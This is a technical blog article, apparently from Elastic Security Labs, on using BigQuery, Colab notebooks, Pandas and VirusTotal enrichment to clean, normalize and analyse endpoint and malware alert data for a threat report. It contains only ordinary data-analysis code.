            <description><![CDATA[This article explains how we conduct comprehensive cyber threat data analysis using Google Cloud, from data extraction and preprocessing to trend analysis and presentation. It emphasizes the value of BigQuery, Python, and Google Sheets - showcasing how to refine and visualize data for insightful cybersecurity analysis.]]></description>
            <content:encoded><![CDATA[<h1>Introduction</h1>
<p>In today's digital age, the sheer volume of data generated by devices and systems can be both a challenge and an opportunity for security practitioners. Analyzing a high magnitude of data to craft valuable or actionable insights on cyber attack trends requires precise tools and methodologies.</p>
<p>Before you delve into the task of data analysis, you might find yourself asking:</p>
<ul>
<li>What specific questions am I aiming to answer, and do I possess the necessary data?</li>
<li>Where is all the pertinent data located?</li>
<li>How can I gain access to this data?</li>
<li>Upon accessing the data, what steps are involved in understanding and organizing it?</li>
<li>Which tools are most effective for extracting, interpreting, or visualizing the data?</li>
<li>Should I analyze the raw data immediately or wait until it has been processed?</li>
<li>Most crucially, what actionable insights can be derived from the data?</li>
</ul>
<p>If these questions resonate with you, you're on the right path. Welcome to the world of Google Cloud, where we'll address these queries and guide you through the process of creating a comprehensive report.</p>
<p>Our approach will include several steps in the following order:</p>
<p><strong>Exploration:</strong> We start by thoroughly understanding the data at our disposal. This phase involves identifying potential insights we aim to uncover and verifying the availability of the required data.</p>
<p><strong>Extraction:</strong> Here, we gather the necessary data, focusing on the most relevant and current information for our analysis.</p>
<p><strong>Pre-processing and transformation:</strong> At this stage, we prepare the data for analysis. This involves normalizing (cleaning, organizing, and structuring) the data to ensure its readiness for further processing.</p>
<p><strong>Trend analysis:</strong> The majority of our threat findings and observations derive from this effort. We analyze the processed data for patterns, trends, and anomalies. Techniques such as time series analysis and aggregation are employed to understand the evolution of threats over time and to highlight significant cyber attacks across various platforms.</p>
<p><strong>Reduction:</strong> In this step, we distill the data to its most relevant elements, focusing on the most significant and insightful aspects.</p>
<p><strong>Presentation:</strong> The final step is about presenting our findings. Utilizing tools from Google Workspace, we aim to display our insights in a clear, concise, and visually-engaging manner.</p>
<p><strong>Conclusion:</strong> Reflecting on this journey, we'll discuss the importance of having the right analytical tools. We'll highlight how Google Cloud Platform (GCP) provides an ideal environment for analyzing cyber threat data, allowing us to transform raw data into meaningful insights.</p>
<h1>Exploration: Determining available data</h1>
<p>Before diving into any sophisticated analyses, it's necessary to prepare by establishing an understanding of the data landscape we intend to study.</p>
<p>Here's our approach:</p>
<ol>
<li><strong>Identifying available data:</strong> The first step is to ascertain what data is accessible. This could include malware phenomena, endpoint anomalies, cloud signals, etc. Confirming the availability of these data types is essential.</li>
<li><strong>Locating the data stores:</strong> Determining the exact location of our data. Knowing where our data resides – whether in databases, data lakes, or other storage solutions – helps streamline the subsequent analysis process.</li>
<li><strong>Accessing the data:</strong> It’s important to ensure that we have the necessary permissions or credentials to access the datasets we need. If we don’t, attempting to identify and request access from the resource owner is necessary.</li>
<li><strong>Understanding the data schema:</strong> Comprehending the structure of our data is vital. Knowing the schema aids in planning the analysis process effectively.</li>
<li><strong>Evaluating data quality:</strong> Just like any thorough analysis, assessing the quality of the data is crucial. We check whether the data is segmented and detailed enough for a meaningful trend analysis.</li>
</ol>
<p>This phase is about ensuring that our analysis is based on solid and realistic foundations. For a report like the <a href="http://www.elastic.co/es/gtr">Global Threat Report</a>, we rely on rich and pertinent datasets such as:</p>
<ul>
<li><strong>Cloud signal data:</strong> This includes data from global Security Information and Event Management (SIEM) alerts, especially focusing on cloud platforms like AWS, GCP, and Azure. This data is often sourced from <a href="https://github.com/elastic/detection-rules">public detection rules</a>.</li>
<li><strong>Endpoint alert data:</strong> Data collected from the global <a href="https://docs.elastic.co/en/integrations/endpoint">Elastic Defend</a> alerts, incorporating a variety of public <a href="https://github.com/elastic/protections-artifacts/tree/main/behavior">endpoint behavior rules</a>.</li>
<li><strong>Malware data:</strong> This involves data from global Elastic Defend alerts, enriched with <a href="https://www.elastic.co/es/blog/introducing-elastic-endpoint-security">MalwareScore</a> and public <a href="https://github.com/elastic/protections-artifacts/tree/main/yara">YARA rules</a>.</li>
</ul>
<p>Each dataset is categorized and enriched for context with frameworks like <a href="https://attack.mitre.org/">MITRE ATT&amp;CK</a>, Elastic Stack details, and customer insights. Storage solutions of Google Cloud Platform, such as BigQuery and Google Cloud Storage (GCS) buckets, provide a robust infrastructure for our analysis.</p>
<p>It's also important to set a data “freshness” threshold, for example excluding data older than 365 days for an annual report, to ensure relevance and accuracy.</p>
<p>Lastly, remember to choose data that offers an unbiased perspective. Excluding or including internal data should be an intentional, strategic decision based on its relevance to your visibility.</p>
<p>In summary, selecting the right tools and datasets is fundamental to creating a comprehensive and insightful analysis. Each choice contributes uniquely to the overall effectiveness of the data analysis, ensuring that the final insights are both valuable and impactful.</p>
<h1>Extraction: The first step in data analysis</h1>
<p>Having identified and located the necessary data, the next step in our analytical journey is to extract this data from our storage solutions. This phase is critical, as it sets the stage for the in-depth analysis that follows.</p>
<h2>Data extraction tools and techniques</h2>
<p>Various tools and programming languages can be utilized for data extraction, including Python, R, Go, Jupyter Notebooks, and Looker Studio. Each tool offers unique advantages, and the choice depends on the specific needs of your analysis.</p>
<p>In our data extraction efforts, we have found the most success from a combination of <a href="https://cloud.google.com/bigquery?hl=en">BigQuery</a>, <a href="https://colab.google/">Colab Notebooks</a>, <a href="https://cloud.google.com/storage/docs/json_api/v1/buckets">buckets</a>, and <a href="https://workspace.google.com/">Google Workspace</a> to extract the required data. Colab Notebooks, akin to Jupyter Notebooks, operate within Google's cloud environment, providing a seamless integration with other Google Cloud services.</p>
<h2>BigQuery for data staging and querying</h2>
<p>In the analysis process, a key step is to &quot;stage&quot; our datasets using BigQuery. This involves utilizing BigQuery queries to create and save objects, thereby making them reusable and shareable across our team. We achieve this by employing the <a href="https://hevodata.com/learn/google-bigquery-create-table/#b2">CREATE TABLE</a> statement, which allows us to combine multiple <a href="https://cloud.google.com/bigquery/docs/datasets-intro">datasets</a> such as endpoint behavior alerts, customer data, and rule data into a single, comprehensive dataset.</p>
<p>This consolidated dataset is then stored in a BigQuery table specifically designated for this purpose–for this example, we’ll refer to it as the “Global Threat Report” dataset. This approach is applied consistently across different types of data, including both cloud signals and malware datasets.</p>
<p>The newly created data table, for instance, might be named <code>elastic.global_threat_report.ep_behavior_raw</code>. This naming convention, defined by BigQuery, helps in organizing and locating the datasets effectively, which is crucial for the subsequent stages of the extraction process.</p>
<p>An example of a BigQuery query used in this process might look like this:</p>
<pre><code>CREATE TABLE elastic.global_threat_report.ep_behavior_raw AS
SELECT * FROM ...
</code></pre>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image8.png" alt="Diagram for BigQuery query to an exported dataset table" />
Diagram for BigQuery query to an exported dataset table</p>
<p>We also use the <a href="https://cloud.google.com/bigquery/docs/reference/standard-sql/other-statements#export_data_statement">EXPORT DATA</a> statement in BigQuery to transfer tables to other GCP services, like exporting them to Google Cloud Storage (GCS) buckets in <a href="https://parquet.apache.org/">parquet file format</a>.</p>
<pre><code>EXPORT DATA
  OPTIONS (
    uri = 'gs://**/ep_behavior/*.parquet',
    format = 'parquet',
    overwrite = true
  )
AS (
SELECT * FROM `project.global_threat_report.2023_pre_norm_ep_behavior`
)
</code></pre>
<h2>Colab Notebooks for loading staged datasets</h2>
<p><a href="https://colab.research.google.com/">Colab Notebooks</a> are instrumental in organizing our data extraction process. They allow for easy access and management of data scripts stored in platforms like GitHub and Google Drive.</p>
<p>For authentication and authorization, we use Google Workspace credentials, simplifying access to various Google Cloud services, including BigQuery and Colab Notebooks. Here's a basic example of how authentication is handled:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image9.png" alt="Diagram for authentication and authorization between Google Cloud services" />
Diagram for authentication and authorization between Google Cloud services</p>
<p>For those new to <a href="https://jupyter-notebook-beginner-guide.readthedocs.io/en/latest/">Jupyter Notebooks</a> or dataframes, it's beneficial to spend time becoming familiar with these tools. They are fundamental in any data analyst's toolkit, allowing for efficient code management, data analysis, and structuring. Mastery of these tools is key to effective data analysis.</p>
<p>Upon creating a notebook in Google Colab, we're ready to extract our custom tables (such as project.global_threat_report.ep_behavior_raw) from BigQuery. This data is then loaded into Pandas Dataframes, a Python library that facilitates data manipulation and analysis. While handling large datasets with Python can be challenging, Google Colab provides robust virtual computing resources. If needed, these resources can be scaled up through the Google Cloud <a href="https://console.cloud.google.com/marketplace/product/colab-marketplace-image-public/colab">Marketplace</a> or the Google Cloud Console, ensuring that even large datasets can be processed efficiently.</p>
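<p>The load step described above can be sketched as follows. The table name comes from the earlier staging example; the BigQuery call is wrapped in a function because it requires authenticated Google Cloud credentials (available in Colab after authenticating, as shown earlier):</p>

```python
def staged_table_query(table: str) -> str:
    """Build the query used to pull a full staged table."""
    return f"SELECT * FROM `{table}`"

def load_staged_table(table: str):
    """Run the query in BigQuery and return the result as a pandas DataFrame."""
    # Deferred import: needs google-cloud-bigquery and authenticated credentials,
    # both available by default in a Colab environment.
    from google.cloud import bigquery
    client = bigquery.Client()
    return client.query(staged_table_query(table)).to_dataframe()

# e.g. df = load_staged_table("project.global_threat_report.ep_behavior_raw")
```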
<h2>Essential Python libraries for data analysis</h2>
<p>In our data analysis process, we utilize various Python libraries, each serving a specific purpose:</p>
<table>
<thead>
<tr>
<th>Library</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://docs.python.org/3/library/datetime.html">datetime</a></td>
<td>Essential for handling all operations related to date and time in your data. It allows you to manipulate and format date and time information for analysis.</td>
</tr>
<tr>
<td><a href="https://google-auth.readthedocs.io/en/master/">google.auth</a></td>
<td>Manages authentication and access permissions, ensuring secure access to Google Cloud services. It's key for controlling who can access your data and services.</td>
</tr>
<tr>
<td><a href="https://cloud.google.com/python/docs/reference/bigquery/latest">google.colab.auth</a></td>
<td>Provides authentication for accessing Google Cloud services within Google Colab notebooks, enabling a secure connection to your cloud-based resources.</td>
</tr>
<tr>
<td><a href="https://cloud.google.com/python/docs/reference/bigquery/latest">google.cloud.bigquery</a></td>
<td>A tool for managing large datasets in Google Cloud's BigQuery service. It allows for efficient processing and analysis of massive amounts of data.</td>
</tr>
<tr>
<td><a href="https://cloud.google.com/python/docs/reference/storage/latest">google.cloud.storage</a></td>
<td>Used for storing and retrieving data in Google Cloud Storage. It's an ideal solution for handling various data files in the cloud.</td>
</tr>
<tr>
<td><a href="https://docs.gspread.org/en/latest/">gspread</a></td>
<td>Facilitates interaction with Google Spreadsheets, allowing for easy manipulation and analysis of spreadsheet data.</td>
</tr>
<tr>
<td><a href="https://pypi.org/project/gspread-dataframe/">gspread.dataframe</a>.set_with_dataframe</td>
<td>Syncs data between Pandas dataframes and Google Spreadsheets, enabling seamless data transfer and updating between these formats.</td>
</tr>
<tr>
<td><a href="https://pypi.org/project/matplotlib/">matplotlib</a>.pyplot.plt</td>
<td>A module in Matplotlib library for creating charts and graphs. It helps in visualizing data in a graphical format, making it easier to understand patterns and trends.</td>
</tr>
<tr>
<td><a href="https://pandas.pydata.org/">pandas</a></td>
<td>A fundamental tool for data manipulation and analysis in Python. It offers data structures and operations for manipulating numerical tables and time series.</td>
</tr>
<tr>
<td><a href="https://pypi.org/project/pandas-gbq/">pandas.gbq</a>.to_gbq</td>
<td>Enables the transfer of data from Pandas dataframes directly into Google BigQuery, streamlining the process of moving data into this cloud-based analytics platform.</td>
</tr>
<tr>
<td><a href="https://arrow.apache.org/docs/python/index.html">pyarrow</a>.parquet.pq</td>
<td>Allows for efficient storage and retrieval of data in the Parquet format, a columnar storage file format optimized for use with large datasets.</td>
</tr>
<tr>
<td><a href="https://seaborn.pydata.org/">seaborn</a></td>
<td>A Python visualization library based on Matplotlib that provides a high-level interface for drawing attractive and informative statistical graphics.</td>
</tr>
</tbody>
</table>
<p>Next, we authenticate with BigQuery and receive authorization to access our datasets, as illustrated earlier. By using Google Workspace credentials, we can easily access BigQuery and other Google Cloud services. The process typically involves a simple code snippet for authentication:</p>
<pre><code>from google.colab import auth
from google.cloud import bigquery

auth.authenticate_user()
project_id = &quot;PROJECT_FROM_GCP&quot;
client = bigquery.Client(project=project_id)
</code></pre>
<p>With authentication complete, we can then proceed to access and manipulate our data. Google Colab's integration with Google Cloud services simplifies this process, making it efficient and secure.</p>
<h2>Organizing Colab Notebooks before analysis</h2>
<p>When working with Jupyter Notebooks, it's better to organize your notebook beforehand. Various stages of handling and manipulating data will be required, and staying organized will help you create a repeatable, comprehensive process.</p>
<p>In our notebooks, we use Jupyter Notebook headers to organize the code systematically. This structure allows for clear compartmentalization and the creation of collapsible sections, which is especially beneficial when dealing with complex data operations that require multiple steps. This methodical organization aids in navigating the notebook efficiently, ensuring that each step in the data extraction and analysis process is easily accessible and manageable.</p>
<p>Moreover, while the workflow in a notebook might seem linear, it's often more dynamic. Data analysts frequently engage in multitasking, jumping between different sections as needed based on the data or results they encounter. Furthermore, new insights discovered in one step may influence another step’s process, leading to some back and forth before finishing the notebook.
<img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image3.png" alt="" /></p>
<h2>Extracting Our BigQuery datasets into dataframes</h2>
<p>After establishing the structure of our notebook and successfully authenticating with BigQuery, our next step is to retrieve the required datasets. This process sets the foundation for the rest of the report, as the information from these sources will form the basis of our analysis, similar to selecting the key components required for a comprehensive study.</p>
<p>Here's an example of how we might fetch data from BigQuery:</p>
<pre><code>import datetime

current_year = datetime.datetime.now().year
reb_dataset_id = f'project.global_threat_report.{current_year}_raw_ep_behavior'
reb_table = client.list_rows(reb_dataset_id)
reb_df = reb_table.to_dataframe() 
</code></pre>
<p>This snippet demonstrates a typical data retrieval process. We first define the dataset we're interested in (for the Global Threat Report, <code>project.global_threat_report.{current_year}_raw_ep_behavior</code>). Then, we use the BigQuery client to list the table's rows and load them into a Pandas DataFrame. This DataFrame will serve as the foundation for our subsequent data analysis steps.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image4.png" alt="Colab Notebook snippet for data extraction from BigQuery into Pandas dataframe" />
Colab Notebook snippet for data extraction from BigQuery into Pandas dataframe</p>
<p>This process marks the completion of the extraction phase. We have successfully navigated BigQuery to select and retrieve the necessary datasets and load them in our notebooks within dataframes. The extraction phase is pivotal, as it not only involves gathering the data but also setting up the foundation for deeper analysis. It's the initial step in a larger journey of discovery, leading to the transformation phase, where we will uncover more detailed insights from the data.</p>
<p>In summary, this part of our data journey is about more than just collecting datasets; it's about structurally preparing them for the in-depth analysis that follows. This meticulous approach to organizing and executing the extraction phase sets the stage for the transformative insights that we aim to derive in the subsequent stages of our data analysis.</p>
<h1>Pre-processing and transformation: The critical phase of data analysis</h1>
<p>The transition from raw data to actionable insights involves a series of crucial steps in data processing. After extracting data, our focus shifts to refining it for analysis. Cybersecurity datasets often include various forms of noise, such as false positives and anomalies, which must be addressed to ensure accurate and relevant analysis.</p>
<p>Key stages in data pre-processing and transformation:</p>
<ul>
<li><strong>Data cleaning:</strong> This stage involves filling NULL values, correcting data misalignments, and validating data types to ensure the dataset's integrity.</li>
<li><strong>Data enrichment:</strong> In this step, additional context is added to the dataset. For example, incorporating third-party data, like malware reputations from sources such as VirusTotal, enhances the depth of analysis.</li>
<li><strong>Normalization:</strong> This process standardizes the data to ensure consistency, which is particularly important for varied datasets like endpoint malware alerts.</li>
<li><strong>Anomaly detection:</strong> Identifying and rectifying outliers or false positives is critical to maintain the accuracy of the dataset.</li>
<li><strong>Feature extraction:</strong> The process of identifying meaningful, consistent data points that can be further extracted for analysis.</li>
</ul>
<h2>Embracing the art of data cleaning</h2>
<p>Data cleaning is a fundamental step in preparing datasets for comprehensive analysis, especially in cybersecurity. This process involves a series of technical checks to ensure data integrity and reliability. Here are the specific steps:</p>
<ul>
<li>
<p><strong>Mapping to MITRE ATT&amp;CK framework:</strong> Verify that all detection and response rules in the dataset are accurately mapped to the corresponding tactics and techniques in the MITRE ATT&amp;CK framework. This check includes looking for NULL values or any inconsistencies in how the data aligns with the framework.</p>
</li>
<li>
<p><strong>Data type validation:</strong> Confirm that the data types within the dataset are appropriate and consistent. For example, timestamps should be in a standardized datetime format. This step may involve converting string formats to datetime objects or verifying that numerical values are in the correct format.</p>
</li>
<li>
<p><strong>Completeness of critical data:</strong> Ensure that no vital information is missing from the dataset. This includes checking for the presence of essential elements like SHA256 hashes or executable names in endpoint behavior logs. The absence of such data can lead to incomplete or biased analysis.</p>
</li>
<li>
<p><strong>Standardization across data formats:</strong> Assess and implement standardization of data formats across the dataset to ensure uniformity. This might involve normalizing text formats, ensuring consistent capitalization, or standardizing date and time representations.</p>
</li>
<li>
<p><strong>Duplicate entry identification:</strong> Identify and remove duplicate entries by examining unique identifiers such as XDR agent IDs or cluster IDs. This process might involve using functions to detect and remove duplicates, ensuring the uniqueness of each data entry.</p>
</li>
<li>
<p><strong>Exclusion of irrelevant internal data:</strong> Locate and remove any internal data that might have inadvertently been included in the dataset. This step is crucial to prevent internal biases or irrelevant information from affecting the analysis.</p>
</li>
</ul>
<p>It is important to note that data cleaning or “scrubbing the data” is a continuous effort throughout our workflow. As we continue to peel back the layers of our data and wrangle it for various insights, it is expected that we identify additional changes.</p>
<h2>Utilizing Pandas for data cleaning</h2>
<p>The <a href="https://pandas.pydata.org/about/">Pandas</a> library in Python offers several functionalities that are particularly useful for data cleaning in cybersecurity contexts. Some of these methods include:</p>
<ul>
<li><code>DataFrame.isnull()</code> or <code>DataFrame.notnull()</code> to identify missing values.</li>
<li><code>DataFrame.drop_duplicates()</code> to remove duplicate rows.</li>
<li>Data type conversion methods like <code>pd.to_datetime()</code> for standardizing timestamp formats.</li>
<li>Utilizing boolean indexing to filter out irrelevant data based on specific criteria.</li>
</ul>
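<p>As a quick illustration (the column names here are invented for the example, not drawn from our actual dataset), several of these methods might be chained together like so:</p>

```python
import pandas as pd

# Illustrative alert data: 'timestamp' arrives as strings, one row is a
# duplicate, and agent "a3" stands in for irrelevant internal data
df = pd.DataFrame({
    "agent_id": ["a1", "a2", "a2", "a3"],
    "timestamp": ["2023-01-01", "2023-01-02", "2023-01-02", None],
    "rule_name": ["r1", "r2", "r2", "r3"],
})

# Identify rows missing critical fields
missing = df[df["timestamp"].isnull()]

# Remove duplicate entries
df = df.drop_duplicates()

# Standardize timestamp strings into datetime objects
df["timestamp"] = pd.to_datetime(df["timestamp"])

# Boolean indexing to filter out irrelevant internal data
df = df[df["agent_id"] != "a3"]
```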
<p>A thorough understanding of the dataset is essential to determine the right cleaning methods. It may be necessary to explore the dataset preliminarily to identify specific areas requiring cleaning or transformation. Additional helpful methods and workflows can be found listed in <a href="https://realpython.com/python-data-cleaning-numpy-pandas/">this</a> Real Python blog.</p>
<h2>Feature extraction and enrichment</h2>
<p>Feature extraction and enrichment are core steps in data analysis, particularly in the context of cybersecurity. These processes involve transforming and augmenting the dataset to enhance its usefulness for analysis.</p>
<ul>
<li><strong>Create new data from existing:</strong> This is where we modify or use existing data to add additional columns or rows.</li>
<li><strong>Add new data from 3rd-party:</strong> Here, we use existing data as a query reference for 3rd-party RESTful APIs which respond with additional data we can add to the datasets.</li>
</ul>
<h2>Feature extraction</h2>
<p>Let’s dig into a tangible example. Imagine we're presented with a bounty of publicly available YARA signatures that Elastic <a href="https://github.com/elastic/protections-artifacts/tree/main/yara/rules">shares</a> with its community. These signatures trigger some of the endpoint malware alerts in our dataset. A consistent naming convention has been observed based on the rule name that, of course, shows up in the raw data: <code>OperationsSystem_MalwareCategory_MalwareFamily</code>. These names can be deconstructed to provide more specific insights. Leveraging Pandas, we can expertly slice and dice the data. For those who prefer doing this during the dataset staging phase with BigQuery, the combination of <a href="https://cloud.google.com/bigquery/docs/reference/standard-sql/string_functions#split">SPLIT</a> and <a href="https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators#offset_and_ordinal">OFFSET</a> clauses can yield similar results:</p>
<pre><code>df[['OperatingSystem', 'MalwareCategory', 'MalwareFamily']] = df['yara_rule_name'].str.split('_', expand=True)
</code></pre>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image2.png" alt="Feature extraction with our YARA data" />
Feature extraction with our YARA data</p>
<p>There are additional approaches, methods, and processes to feature extraction in data analysis. We recommend consulting your stakeholder's wants/needs and exploring your data to help determine what is necessary for extraction and how.</p>
<h2>Data enrichment</h2>
<p>Data enrichment enhances the depth and context of cybersecurity datasets. One effective approach involves integrating external data sources to provide additional perspectives on the existing data. This can be particularly valuable in understanding and interpreting cybersecurity alerts.</p>
<p><strong>Example of data enrichment: Integrating VirusTotal reputation data</strong>
A common method of data enrichment in cybersecurity involves incorporating reputation scores from external threat intelligence services like <a href="https://www.virustotal.com/gui/home/search">VirusTotal</a> (VT). This process typically includes:</p>
<ol>
<li><strong>Fetching reputation data:</strong> Using an API key from VT, we can query for reputational data based on unique identifiers in our dataset, such as SHA256 hashes of binaries.</li>
</ol>
<pre><code>import requests

def get_reputation(sha256, API_KEY, URL):
    params = {'apikey': API_KEY, 'resource': sha256}
    response = requests.get(URL, params=params)
    json_response = response.json()
    
    if json_response.get(&quot;response_code&quot;) == 1:
        positives = json_response.get(&quot;positives&quot;, 0)
        return classify_positives(positives)
    else:
        return &quot;unknown&quot;
</code></pre>
<p>In this function, <code>classify_positives</code> is a custom function that classifies the reputation based on the number of antivirus engines that flagged the file as malicious.</p>
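<p>The article leaves <code>classify_positives</code> as an exercise; a minimal sketch, with admittedly arbitrary thresholds, could look like this:</p>

```python
def classify_positives(positives: int) -> str:
    """Bucket a VirusTotal positives count into a coarse reputation label.

    The thresholds below are illustrative, not Elastic's actual cutoffs.
    """
    if positives == 0:
        return "clean"
    elif positives <= 5:
        return "suspicious"
    return "malicious"
```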
<ol start="2">
<li><strong>Adding reputation data to the dataset:</strong> The reputation data fetched from VirusTotal is then integrated into the existing dataset. This is done by applying the <code>get_reputation</code> function to each relevant entry in the DataFrame.</li>
</ol>
<pre><code>df['reputation'] = df['sha256'].apply(lambda x: get_reputation(x, API_KEY, URL))
</code></pre>
<p>Here, a new column named <code>reputation</code> is added to the dataframe, providing an additional layer of information about each binary based on its detection rate in VirusTotal.</p>
<p>This method of data enrichment is just one of many options available for enhancing cybersecurity threat data. By utilizing robust helper functions and tapping into external data repositories, analysts can significantly enrich their datasets. This enrichment allows for a more comprehensive understanding of the data, leading to a more informed and nuanced analysis. The techniques demonstrated here are part of a broader range of advanced data manipulation methods that can further refine cybersecurity data analysis.</p>
<h2>Normalization</h2>
<p>Especially when dealing with varied datasets in cybersecurity, such as endpoint alerts and cloud SIEM notifications, normalization may be required to get the most out of your data.</p>
<p><strong>Understanding normalization:</strong> At its core, normalization is about adjusting values measured on different scales to a common scale, ensuring that they are proportionally represented, and reducing redundancy. In the cybersecurity context, this means representing events or alerts in a manner that doesn't unintentionally amplify or reduce their significance.</p>
<p>Consider our endpoint malware dataset. When analyzing trends, say, infections based on malware families or categories, we aim for an accurate representation. However, a single malware infection on an endpoint could generate multiple alerts depending on the Extended Detection and Response (XDR) system. If left unchecked, this could significantly skew our understanding of the threat landscape. To counteract this, we consider the Elastic agents, which are deployed as part of the XDR solution. Each endpoint has a unique agent, representing a single infection instance if malware is detected. Therefore, to normalize this dataset, we would &quot;flatten&quot; or adjust it based on unique agent IDs. This means, for our analysis, we'd consider the number of unique agent IDs affected by a specific malware family or category rather than the raw number of alerts.</p>
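<p>A toy sketch of this flattening (with hypothetical <code>agent_id</code> and <code>malware_family</code> columns) makes the difference concrete:</p>

```python
import pandas as pd

# Toy alert data: one infected agent can emit many alerts for the same family
df = pd.DataFrame({
    "agent_id": ["a1", "a1", "a1", "a2", "a3"],
    "malware_family": ["XorDDoS", "XorDDoS", "XorDDoS", "XorDDoS", "Gafgyt"],
})

# Raw alert counts over-represent noisy endpoints...
raw_counts = df.groupby("malware_family").size()

# ...so "flatten" to unique affected agents per family instead
normalized = df.groupby("malware_family")["agent_id"].nunique()
```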
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image6.png" alt="Example visualization of malware alert normalization by unique agents" />
Example visualization of malware alert normalization by unique agents</p>
<p>As depicted in the image above, if we chose not to normalize the malware data in preparation for trend analysis, our key findings would depict inaccurate information. This inaccuracy could stem from a range of data inconsistencies, such as generic YARA rules or programmatic operations that were flagged repeatedly on a single endpoint.</p>
<p><strong>Diversifying the approach:</strong> On the other hand, when dealing with endpoint behavior alerts or cloud alerts (from platforms like AWS, GCP, Azure, Google Workspace, and O365), our normalization approach might differ. These datasets could have their own nuances and may not require the same &quot;flattening&quot; technique used for malware alerts.</p>
<p><strong>Conceptualizing normalization options:</strong> Remember the goal of normalization is to reduce redundancy in your data. Make sure to keep your operations as atomic as possible in case you need to go back and tweak them later. This is especially true when performing both normalization and standardization. Sometimes these can be difficult to separate, and you may have to go back and forth between the two. Analysts have a wealth of options for these. From <a href="https://www.geeksforgeeks.org/data-pre-processing-wit-sklearn-using-standard-and-minmax-scaler/">Min-Max</a> scaling, where values are shifted and rescaled to range between 0 and 1, to <a href="https://www.statology.org/z-score-python/">Z-score</a> normalization (or standardization), where values are centered around zero and standard deviations from the mean. The choice of technique depends on the nature of the data and the specific requirements of the analysis.</p>
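<p>Both techniques are one-liners with Pandas; here is a small sketch on illustrative per-rule alert counts:</p>

```python
import pandas as pd

# Illustrative per-rule alert counts
counts = pd.Series([10.0, 20.0, 30.0, 40.0])

# Min-Max scaling: shift and rescale values into the [0, 1] range
min_max = (counts - counts.min()) / (counts.max() - counts.min())

# Z-score standardization: center around zero in units of standard deviation
z_scores = (counts - counts.mean()) / counts.std()
```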
<p>In essence, normalization ensures that our cybersecurity analysis is based on a level playing field, giving stakeholders an accurate view of the threat environment without undue distortions. This is a critical step before trend analysis.</p>
<h2>Anomaly detection: Refining the process of data analysis</h2>
<p>In the realm of cybersecurity analytics, a one-size-fits-all approach to anomaly detection does not exist. The process is highly dependent on the specific characteristics of the data at hand. The primary goal is to identify and address outliers that could potentially distort the analysis. This requires a dynamic and adaptable methodology, where understanding the nuances of the dataset is crucial.</p>
<p>Anomaly detection in cybersecurity involves exploring various techniques and methodologies, each suited to different types of data irregularities. The strategy is not to rigidly apply a single method but rather to use a deep understanding of the data to select the most appropriate technique for each situation. The emphasis is on flexibility and adaptability, ensuring that the approach chosen provides the clearest and most accurate insights into the data.</p>
<h3>Statistical methods – The backbone of analysis:</h3>
<p>Statistical analysis is a foundational approach to anomaly detection, especially for cybersecurity data. By understanding the inherent distribution and central tendencies of our data, we can highlight values that deviate from the norm. A simple yet powerful method, the Z-score, gauges the distance of a data point from the mean in terms of standard deviations.</p>
<pre><code>import numpy as np

# Z-scores require a numeric feature, so first aggregate alert counts per technique
counts = df.groupby('mitre_technique').size()

# Derive Z-scores for each technique's alert count
z_scores = np.abs((counts - counts.mean()) / counts.std())

outliers = counts[z_scores &gt; 3]  # Conventionally, a Z-score above 3 signals an outlier
</code></pre>
<p><strong>Why this matters:</strong> This method allows us to quantitatively gauge the significance of a data point's deviation. Such outliers can heavily skew aggregate metrics like mean or even influence machine learning model training detrimentally. Remember, outliers should not always be removed; it is all about context! Sometimes you may even be looking for the outliers specifically.</p>
<p><strong>Key library:</strong> While we utilize <a href="https://numpy.org/">NumPy</a> above, <a href="https://scipy.org/">SciPy</a> can also be employed for intricate statistical operations.</p>
<h3>Aggregations and sorting – Unraveling layers:</h3>
<p>Data often presents itself in layers. By starting with a high-level view and gradually diving into specifics, we can locate inconsistencies or anomalies. When we aggregate by categories such as the MITRE ATT&amp;CK tactic, and then delve deeper, we gradually uncover the finer details and potential anomalies as we go from technique to rule logic and alert context.</p>
<pre><code># Aggregating by tactics first
tactic_agg = df.groupby('mitre_tactic').size().sort_values(ascending=False)
</code></pre>
<p>From here, we can identify the most common tactics and choose the tactic with the highest count. We then filter our data for this tactic to identify the most common technique associated with it. Techniques are often more specific than tactics and thus add more explanation about what we may be observing. Following the same approach, we can then filter for this specific technique, aggregate by rule, and review that detection rule for more context. The goal here is to find “noisy” rules that may be skewing our dataset, so their related alerts can be removed. This cycle can be repeated until outliers are removed and the percentages appear more accurate.</p>
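<p>One pass of this drill-down cycle could be sketched as follows (the column and rule names are illustrative):</p>

```python
import pandas as pd

# Toy alert data standing in for the real dataset
df = pd.DataFrame({
    "mitre_tactic": ["Execution"] * 4 + ["Discovery"],
    "mitre_technique": ["Scripting"] * 3 + ["WMI", "Account Discovery"],
    "detection_rule": ["Noisy Rule"] * 3 + ["Rule B", "Rule C"],
})

# Aggregate by tactic, pick the most common, and drill into its techniques
top_tactic = df.groupby("mitre_tactic").size().idxmax()
by_technique = df[df["mitre_tactic"] == top_tactic].groupby("mitre_technique").size()

# Drill one level further to find the rule driving the top technique...
top_technique = by_technique.idxmax()
by_rule = df[df["mitre_technique"] == top_technique].groupby("detection_rule").size()

# ...and, if that rule proves noisy, drop its alerts and repeat the cycle
df_refined = df[df["detection_rule"] != by_rule.idxmax()]
```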
<p><strong>Why this matters:</strong> This layered analysis approach ensures no stone is left unturned. By navigating from the general to the specific, we systematically weed out inconsistencies.</p>
<p><strong>Key library:</strong> Pandas remains the hero, equipped to handle data-wrangling chores with finesse.</p>
<h3>Visualization – The lens of clarity:</h3>
<p>Sometimes, the human eye, when aided with the right visual representation, can intuitively detect what even the most complex algorithms might miss. A boxplot, for instance, not only shows the central tendency and spread of data but distinctly marks outliers.</p>
<pre><code>import seaborn as sns
import matplotlib.pyplot as plt

plt.figure(figsize=(12, 8))
sns.boxplot(x='Malware Family', y='Malware Score', data=df)
plt.title('Distribution of Malware Scores by Family')
plt.show()
</code></pre>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image10.png" alt="Example visualization of malware distribution scores by family from an example dataset" />
